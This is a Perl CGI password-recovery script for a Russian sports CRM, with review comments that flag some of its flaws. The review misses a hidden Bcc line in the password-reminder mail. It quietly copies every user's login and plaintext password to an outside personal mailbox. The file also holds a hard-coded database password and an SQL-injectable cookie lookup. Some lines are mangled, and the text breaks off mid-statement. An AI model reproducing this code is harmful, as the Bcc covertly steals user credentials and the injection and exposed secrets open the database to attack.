#!/usr/bin/perl -w
use DBI;
use warnings;
use CGI::Carp qw(fatalsToBrowser);
use CGI;
use POSIX;
use Switch;
use CGI qw/:standard/;
use CGI::Cookie;
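# Page-wide settings and the database handle used by the rest of the script.
# $brow, $diskont and $shablon are package globals; the others are file-scoped.
$brow = $ENV{'HTTP_USER_AGENT'};   # client-supplied header: untrusted wherever it is used
$diskont = 0;
$shablon = "/var/www/u0297054/data/www/gen.sportsdaily.ru/index.html";   # template opened further down
my $myname = "/cgi-bin/index.pl";

# NOTE(review): the database account and password are hard-coded in a CGI
# script. Anyone who can read this file (source disclosure, a stray backup
# copy, a repository or paste) gets direct database access. Load them from a
# file outside the web root with restrictive permissions, and rotate this
# password, since it has been stored in clear text.
my $dsn = "DBI:mysql:u0297054_gen:localhost";
my $db_user_name = "u0297054_default";
my $db_password = "_9WvWT6m";

# Stop with a generic message when the connection fails. Without this check the
# first $dbh->prepare dies on an undefined handle, and CGI::Carp's
# fatalsToBrowser would show that internal error to the visitor. DBI's own
# PrintError (on by default) already writes the driver error to the server log.
my $dbh = DBI->connect($dsn, $db_user_name, $db_password)
    or die "Service temporarily unavailable\n";
# $koi = $dbh->prepare("SET CHARACTER SET koi8r");
# $koi8 = $koi->execute;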
# Build an identifier string: the current epoch time in seconds immediately
# followed by a random integer in the range 0..99999. The value is returned and
# also left in the package global $gen_uid_str.
# NOTE(review): both parts are guessable (clock value plus Perl's non-cryptographic
# rand). If this value ever serves as a session or account token, confirm with
# the callers and switch to an identifier drawn from the OS random source.
sub gen_uid
{
    $gen_uid_str = join('', time(), int(rand(100000)));
    return $gen_uid_str;
}
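# Return the argument with its first character upper-cased.
#
# Parameters: $reta - the string to capitalise.
# Returns:    the capitalised string; '' for an undefined or empty argument.
#
# Working variables are lexical, so the call no longer overwrites the package
# globals $lenga, $first and $second that the original assigned.
sub zagla
{
    my ($reta) = @_;

    # Nothing to capitalise; this also avoids substr() reading past the end of
    # an empty string.
    return '' unless defined($reta) && length($reta);

    my $first  = substr($reta, 0, 1);
    my $second = substr($reta, 1);

    # tr/// takes character lists, not a regex class: the square brackets are
    # literal characters that simply map to themselves.
    # NOTE(review): the Cyrillic ranges are matched byte-wise (no "use utf8"),
    # so they presumably rely on the script file and the input sharing one
    # single-byte encoding - confirm before relying on non-ASCII input.
    $first =~ tr/[a-zа-я]/[A-ZА-Я]/;

    return $first.$second;
}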
# Normalise line breaks and double quotes in one text record, then split it
# into fields on the TAB character (\x09).
# Takes the record as its single argument and returns the list of fields.
# Both working variables ($spl_line, @spl_ls) are package globals, so each call
# overwrites the values left by the previous one.
sub splitline
{
$spl_line=shift;
# NOTE(review): as rendered here, the replacement text of the next three
# substitutions is a bare line break, and the quote substitution below yields
# `";`. This looks like markup (a line-break tag, an HTML entity) that was lost
# when the page was rendered - confirm against the real file before changing it.
$spl_line=~s/\n/
/g;
$spl_line=~s/\r/
/g;
# This pattern can never match: the previous substitution has already removed
# every \r from the string.
$spl_line=~s/\n\r/
/g;
# $spl_line=~s/\"\"/\'/g; # ensure compatibility with Excel and Lotus 1-2-3
# Rewrite every double quote in the record.
$spl_line=~s/\"/"\;/g;
# $spl_line=~s/\\\'/\'/g; #
# $spl_line=~s/\\\"/\"/g; #
# Fields are TAB-separated.
@spl_ls=split(/\x09/,$spl_line);
return @spl_ls;
}
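# Parse the request parameters into %Form. Every value is untrusted client input.
# A request body is read from STDIN when CONTENT_LENGTH is set; otherwise the
# query string is used.
# NOTE(review): the body length comes straight from the request and is not
# capped here; consider rejecting bodies larger than this form can need.
if ($ENV{'CONTENT_LENGTH'}) {
read(STDIN, $param_str, $ENV{'CONTENT_LENGTH'});
} else {
$param_str=$ENV{'QUERY_STRING'};
}
$param_str = '' unless defined $param_str;
@pairs=split(/&/,$param_str);
foreach $pair (@pairs) {
# Limit 2: only the first "=" separates name from value, so a value that
# itself contains "=" is no longer cut short.
($name, $value) = split(/=/, $pair, 2);
$name = '' unless defined $name;
$value = '' unless defined $value;
$name =~ tr/+/ /;
$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
# Escape single quotes only AFTER percent-decoding. The original escaped the
# raw text first, so a percent-encoded quote was decoded afterwards and reached
# %Form (and the SQL built from it) as a literal quote.
# This is defence in depth only; queries should still use bound parameters.
$value =~ s/\'/\&\#39\;/g;
# NOTE(review): as rendered here the next two replacements are a bare line
# break; this looks like markup lost when the page was rendered - confirm
# against the real file.
$value =~ s/\n\r/
/g;
$value =~ s/\n/
/g;
$value =~ s/\r//g;
$value =~ s/\x09//g;
# $value =~ s/\'/\\\'/g; $value =~ s/\"/\\\"/g;
# $AdmForm{$name}=$value;
# $value=~s/\<\;/g;
# $value=~s/>/\>\;/g;
$Form{$name}=$value;
}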
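# Look up the account that matches the requested e-mail address or login.
# NOTE(review): the line below lower-cases the 'login' key, while the query
# reads 'Email' and 'Login' - these are different hash keys; confirm which
# field names the form really sends.
$Form{'login'} = lc(defined $Form{'login'} ? $Form{'login'} : '');
# The request values are passed as bound parameters instead of being spliced
# into the SQL text, so their content cannot change the statement. An undefined
# field is sent as '' to match what string interpolation produced before.
$select869 = "SELECT * FROM USERS where LOWER(EMAIL) = LOWER(?) or LOWER(LOGIN) = LOWER(?)";
$sth869 = $dbh->prepare($select869);
$rv869 = $sth869->execute(
    defined $Form{'Email'} ? $Form{'Email'} : '',
    defined $Form{'Login'} ? $Form{'Login'} : '',
);
# Only the first matching row is kept; later code addresses its columns by
# position, which silently breaks if the USERS column order changes.
# NOTE(review): the "send" handler further down mails column index 2 of this
# row as the password, so passwords must be stored in recoverable form. Prefer
# salted password hashes and a single-use, expiring reset link.
# NOTE(review): the AFID cookie lookup later in the script also builds its SQL
# by interpolation and needs the same bound-parameter change.
@set869 = $sth869->fetchrow_array;
###################################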
# Lookup table for the confirmation code: ten rows of twelve 8-character hex
# tokens. The "send" handler below cuts the submitted `secureid` into four
# 8-character pieces and, for each piece, appends the index of the row that
# contains it, so the row index is the decoded digit.
# NOTE(review): both `secureid` and `secure_code` arrive in the same request and
# this table is static, so the check keeps no per-session state on the server;
# a pair that validated once will validate again. Consider a server-side,
# single-use challenge instead.
@str = (
    [qw(040b7cf4 a55014e1 85813e06 44502ea9 3776081c a1f9765b ec582383 65d8ade9 15dae597 77a2732c ff968b46 56d42783)],
    [qw(fafda174 93d30432 5fefa0aa 8d1b6694 2b4c9cfa cb612f3d bfaa3576 d9fff4cd b8e32c77 dec45bcb 2693af70 c8fd7a8b)],
    [qw(78183541 94c4feae 57304aba dc2c437c a5b564f6 38f409d1 8b3f7e0a ae45d366 a5b564f6 38f409d1 8b3f7e0a ae45d366)],
    [qw(080c993f b3b58e26 c1d2265b f9da0af3 16d8a58d 14a62420 c9a1cbc0 93035e31 658732ab 6d93c96e 6f3d269a 3e9d1615)],
    [qw(8cb9014a 936acf4a 5e33c252 fa396512 dd93a7eb 7d215fa5 f79498d0 a69a1db2 23f35020 df135821 bc9a1c51 e3900047)],
    [qw(d7f71f28 449665f9 eefc114e 5e7d3e7b 747c1bcc eb6109a4 ef936bc7 0cfd17de 44d15d3e 9bc2f93b 2b3d566d e51a2681)],
    [qw(28a74b8d 7de3373b 4bed858f c10b6bf5 380c5022 5d67f81a faf12a79 5543782a f4661398 cb1a3abd 3ffe5860 0bf11322)],
    [qw(26b6c45e 76b70cfd 19974fcf 77c3592a 369351f0 daad52f9 57f7d120 38c84bd6 b92f8ab7 a47e21fb 03306934 2d6663b0)],
    [qw(3454585c 5d2ef620 8acdce40 5b0b62ce 9366159e c10ed346 f9692f4d 51231979 9b3d3481 ae526dc4 bb6b970b 151fbc0c)],
    [qw(28ce9bc9 54876829 eeb56ff4 6da8e1ab 90d89ecc fe93456d 58a2872a 9350f6a9 31c0c178 a9fc26ff ecffd867 0d1d746d)],
);
if ($Form{'action'} eq "send")
{
$eggog = "";
$encoded = $Form{'secureid'};
$decoded = "";
for( $i=0; $i<4; $i++ )
{
$sequence = substr( $encoded, $i*8, 8 );
$found = "0";
for( $j=0; $j<10; $j = $j + 1 )
{
for( $k=0; $k<12; $k = $k + 1)
{
if( $sequence eq $str[$j][$k] )
{
$decoded=$decoded.$j;
$j=10;
$k=12;
}
}
}
}
$tezt = $decoded;
if ($rv869 ne "1")
{
$eggog = "Пользователь с указанными данными не зарегистрирован";
}
if ($Form{'secure_code'} ne $tezt)
{
$eggog = "Неправильно введен код подтверждения";
}
if ((length($Form{'Login'}) == 0) && (length($Form{'Email'}) == 0))
{
$eggog = "Введите Ваш логин или e-mail";
}
if (length($eggog) < 10)
{
$eggog = "Пароль доступа успешно отправлен на указанный Вами е-mail";
$email = substr($email, 0, -2);
$subj = "Реквизиты доступа к CRM системе Спорт День за Днём";
$text = qq(
Вы запрашивали реквизиты доступа к CRM системе Спорт День за Днём (http://sdzd.cmsonline.ru/)
Логин: $Form{'Login'}
Пароль: $set869[2]
); open SML, "|/usr/sbin/sendmail -t"; print SML "To: $set869[6]\n"; print SML "Bcc: blonde_ds\@mail.ru\n"; print SML "From: sdzd\@cmsonline.ru\n"; print SML "Subject: $subj\n"; print SML "Content-type: text/html; charset=windows-1251\n\n"; print SML "\n\n$text\n"; close SML; $Form{'Login'} = ""; } else { $Form{'login'} =~ s/\\\'/\'/g; $Form{'login'} =~ s/\\\"/\"/g; } } # авторизация #################### my $AFID = -1; my $BSKT = -1; $basketq = 0; $summz = 0; %cookies = fetch CGI::Cookie; foreach (keys %cookies) { if ($cookies{$_}->name eq "AFID") { $AFID = $cookies{'AFID'}->value; $select66 = "SELECT * FROM USERS where UNID = '$AFID'"; $sth66 = $dbh->prepare("$select66"); $rv66 = $sth66->execute; @set66 = $sth66->fetchrow_array; if ($rv66 == 1) { print "Content-type: text/html\n"; print "Location: /admin/index.pl\n\n"; } } } # контент ################################## if ($Form{'err'} eq "1") { $eggog = "Пользователь с указанными логином и паролем не найден"; } ################################ open F, $shablon; @T=